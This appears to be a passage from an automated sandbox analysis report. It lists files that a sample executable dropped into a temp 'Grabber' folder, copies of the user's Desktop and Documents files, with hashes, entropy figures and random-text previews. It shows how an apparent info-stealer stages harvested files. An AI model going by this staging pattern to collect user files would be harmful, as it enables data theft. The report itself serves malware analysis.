SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL\BJZFPPWAPT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
